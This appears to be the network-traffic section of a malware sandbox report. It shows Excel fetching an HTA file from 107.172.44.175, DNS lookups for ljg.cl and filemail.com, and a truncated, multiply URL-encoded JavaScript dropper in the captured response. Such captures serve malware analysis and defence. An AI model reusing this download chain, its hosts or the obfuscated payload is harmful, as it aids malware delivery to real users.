                                                            Nov 26, 2024 15:49:29.556509018 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.556519032 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.560904980 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.560962915 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.560972929 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.564006090 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.564013958 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.564064980 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.564075947 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.568588018 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.568650961 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.568661928 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.572762966 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.572771072 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.572830915 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.572843075 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.577322006 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.577358961 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.577423096 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.577435017 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.577483892 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.580756903 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.580765009 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.580813885 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.580821991 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.584054947 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.584127903 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.584136963 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.735737085 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.735862017 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.735877037 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.739439011 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.739447117 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.739471912 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.739497900 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.739506006 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.739552021 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.743947029 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.743956089 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.743999958 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.744021893 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.744107008 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.748128891 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.748137951 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.748158932 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.748183966 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.748199940 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.751195908 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.751204014 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.751229048 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.751250982 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.751275063 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.755810022 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.755816936 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.755841970 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.755866051 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.755903959 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.759289980 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.759296894 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.759352922 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.759361982 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.759381056 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:29.759413958 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:29.762461901 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:40.861499071 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:40.982064962 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:40.982167959 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:40.982269049 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:41.102250099 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.186249971 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.186388969 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.186402082 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.186434984 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.187165976 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.187177896 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.187213898 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.187839985 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.187850952 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.187891006 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.188855886 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.188868999 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.188915014 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.189538956 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.307688951 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.307781935 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.308625937 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.427556992 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.427638054 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.457899094 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.457959890 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.458014011 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.478723049 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.547722101 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.547775030 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.547854900 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.548015118 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.548027992 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.548038960 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.548209906 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.548844099 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.548856974 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.548897028 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.549638033 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.549650908 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.549693108 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.550478935 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.550489902 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.550535917 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.551397085 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.551409006 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.551419020 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.551450968 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.552248955 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.552261114 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.552304029 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.553067923 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.553313971 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.553365946 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.587172985 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.587459087 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.587522984 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.591175079 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.591305971 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.591454983 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.599030018 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.599231005 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.599283934 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.668144941 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.668241978 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.668351889 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.672427893 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.672683001 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.672733068 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.680891991 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.681063890 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.681114912 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.689336061 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.689533949 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.689583063 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.695549011 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.695688009 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.695741892 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.700897932 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.701023102 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.701102972 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.706895113 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.707022905 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.707107067 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.712373972 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.712588072 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.712668896 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.717597008 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.717778921 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.717830896 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.723937035 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.724113941 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.724172115 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.728910923 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.729048014 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.729094982 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.734499931 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.734703064 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.734759092 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.739815950 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.740003109 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.740060091 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.745395899 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.745609999 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.745659113 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.751102924 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.751321077 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.751384020 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.787656069 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.787842035 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.787894011 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.790661097 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.790797949 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.790941000 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.795953989 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.796232939 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.796315908 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.801552057 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.801760912 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.801811934 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.807246923 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.807377100 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.807429075 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.812726021 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.812894106 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.812944889 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.818284988 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.818475008 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.818521023 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.823801041 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.823991060 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.824033022 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.829824924 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.830101967 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.830154896 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.835856915 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.836196899 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.836249113 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.840923071 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.841058969 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.841105938 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.846081018 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.846242905 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.846292019 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.851094007 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.851279974 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.851335049 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.855896950 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.856112003 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.856172085 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.859915018 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.860121012 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.860167027 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.863913059 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.864109039 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.864164114 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.867764950 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.867911100 CET8049169107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:42.867961884 CET4916980192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:42.991034985 CET4916980192.168.2.22107.172.44.175
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 26, 2024 15:48:58.373936892 CET5456253192.168.2.228.8.8.8
                                                            Nov 26, 2024 15:48:58.636279106 CET53545628.8.8.8192.168.2.22
                                                            Nov 26, 2024 15:49:02.862205029 CET5291753192.168.2.228.8.8.8
                                                            Nov 26, 2024 15:49:03.124542952 CET53529178.8.8.8192.168.2.22
                                                            Nov 26, 2024 15:49:03.125518084 CET5291753192.168.2.228.8.8.8
                                                            Nov 26, 2024 15:49:03.267273903 CET53529178.8.8.8192.168.2.22
                                                            Nov 26, 2024 15:49:03.267580032 CET5291753192.168.2.228.8.8.8
                                                            Nov 26, 2024 15:49:03.401997089 CET53529178.8.8.8192.168.2.22
                                                            Nov 26, 2024 15:49:03.402331114 CET5291753192.168.2.228.8.8.8
                                                            Nov 26, 2024 15:49:03.685038090 CET53529178.8.8.8192.168.2.22
                                                            Nov 26, 2024 15:49:22.656178951 CET6275153192.168.2.228.8.8.8
                                                            Nov 26, 2024 15:49:23.042334080 CET53627518.8.8.8192.168.2.22
                                                            Nov 26, 2024 15:49:23.046621084 CET5789353192.168.2.228.8.8.8
                                                            Nov 26, 2024 15:49:23.295260906 CET53578938.8.8.8192.168.2.22
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 26, 2024 15:48:58.373936892 CET192.168.2.228.8.8.80x448cStandard query (0)ljg.clA (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:02.862205029 CET192.168.2.228.8.8.80xea06Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:03.125518084 CET192.168.2.228.8.8.80xea06Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:03.267580032 CET192.168.2.228.8.8.80xea06Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:03.402331114 CET192.168.2.228.8.8.80xea06Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:22.656178951 CET192.168.2.228.8.8.80x975cStandard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:23.046621084 CET192.168.2.228.8.8.80xf6fbStandard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 26, 2024 15:48:58.636279106 CET8.8.8.8192.168.2.220x448cNo error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:03.124542952 CET8.8.8.8192.168.2.220xea06No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:03.267273903 CET8.8.8.8192.168.2.220xea06No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:03.401997089 CET8.8.8.8192.168.2.220xea06No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:03.685038090 CET8.8.8.8192.168.2.220xea06No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:23.042334080 CET8.8.8.8192.168.2.220x975cNo error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 26, 2024 15:49:23.042334080 CET8.8.8.8192.168.2.220x975cNo error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                            Nov 26, 2024 15:49:23.295260906 CET8.8.8.8192.168.2.220xf6fbNo error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                            Nov 26, 2024 15:49:23.295260906 CET8.8.8.8192.168.2.220xf6fbNo error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                            • ljg.cl
                                                            • 3105.filemail.com
                                                            • 107.172.44.175
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.2249164107.172.44.175803344C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            TimestampBytes transferredDirectionData
                                                            Nov 26, 2024 15:49:00.956290960 CET411OUTGET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1
                                                            Accept: */*
                                                            UA-CPU: AMD64
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 107.172.44.175
                                                            Connection: Keep-Alive
                                                            Nov 26, 2024 15:49:02.095856905 CET1236INHTTP/1.1 200 OK
                                                            Date: Tue, 26 Nov 2024 14:49:00 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Tue, 26 Nov 2024 08:25:56 GMT
                                                            ETag: "10deaf-627cc9922fce5"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1105583
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/hta
                                                            Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 53 63 72 69 70 74 25 32 35 32 35 32 30 4c 61 6e 67 75 61 67 65 25 32 35 32 35 33 44 25 32 35 32 35 32 37 4a 61 76 61 73 63 72 69 70 74 25 32 35 32 35 32 37 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 32 30 48 54 4d 4c 25 32 35 32 35 32 30 45 6e 63 72 79 70 74 69 6f 6e 25 32 35 32 35 32 30 70 72 6f 76 69 64 65 64 25 32 35 32 35 32 30 62 79 25 32 35 32 35 32 30 74 75 66 61 74 2e 63 6f 6d 25 32 35 32 35 32 30 2d 2d 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 30 41 64 6f 63 75 6d 65 [TRUNCATED]
                                                            Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520provided%252520by%252520tufat.com%252520--%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252527%2525253C%25252573%25252563%25252572%25252569%25252570%25252574%25252520%2525256C%25252561%2525256E%25252567%25252575%25252561%25252567%25252565%2525253D%2525254A%25252561%25252576%25252561%25252553%25252563%25252572%25252569%25252570%25252574%2525253E%2525256D%2525253D%25252527%25252525%25252533%25252543%25252553%25252563%25252572%25252569%25252570%25252574%25252525%25252532%25252530%2525254C%25252561%2525256E%25252567%25252575%25252561%25252567%25252565%25252525%25252533%25252544%25252525%25252532%25252537%2525254A%25252561%2525257
                                                            Nov 26, 2024 15:49:02.095985889 CET1236INData Raw: 36 25 32 35 32 35 32 35 36 31 25 32 35 32 35 32 35 37 33 25 32 35 32 35 32 35 36 33 25 32 35 32 35 32 35 37 32 25 32 35 32 35 32 35 36 39 25 32 35 32 35 32 35 37 30 25 32 35 32 35 32 35 37 34 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32
                                                            Data Ascii: 6%25252561%25252573%25252563%25252572%25252569%25252570%25252574%25252525%25252532%25252537%25252525%25252533%25252545%25252525%25252530%25252541%25252525%25252533%25252543%25252525%25252532%25252531%2525252D%2525252D%25252525%25252532%2525253
                                                            Nov 26, 2024 15:49:02.096003056 CET1236INData Raw: 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 34 25 32 35 32 35 32 35 33 34 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 34 25 32 35 32 35 32 35 34 36 25 32 35 32 35 32 35 32 35 25 32 35
                                                            Data Ascii: 5252535%25252534%25252534%25252525%25252532%25252535%25252534%25252546%25252525%25252532%25252535%25252534%25252533%25252525%25252532%25252535%25252535%25252534%25252525%25252532%25252535%25252535%25252539%25252525%25252532%25252535%25252535%2
                                                            Nov 26, 2024 15:49:02.096559048 CET1236INData Raw: 32 35 33 35 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 36 25 32 35 32 35 32 35 33 39 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32
                                                            Data Ascii: 2535%25252525%25252532%25252535%25252536%25252539%25252525%25252532%25252535%25252537%25252536%25252525%25252532%25252535%25252533%25252544%25252525%25252532%25252535%25252532%25252532%25252525%25252532%25252535%25252535%25252538%25252525%2525
                                                            Nov 26, 2024 15:49:02.096571922 CET1236INData Raw: 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 37 25 32 35 32 35 32 35 33 34 25 32 35 32 35 32 35 32 35 25 32 35 32 35 32 35 33 32 25 32 35 32 35 32 35 33 35 25 32 35 32 35 32 35 33 33 25 32 35 32 35 32 35 34 34 25 32 35 32 35 32 35 32 35
                                                            Data Ascii: 2%25252535%25252537%25252534%25252525%25252532%25252535%25252533%25252544%25252525%25252532%25252535%25252532%25252532%25252525%25252532%25252535%25252534%25252539%25252525%25252532%25252535%25252534%25252535%25252525%25252532%25252535%2525253
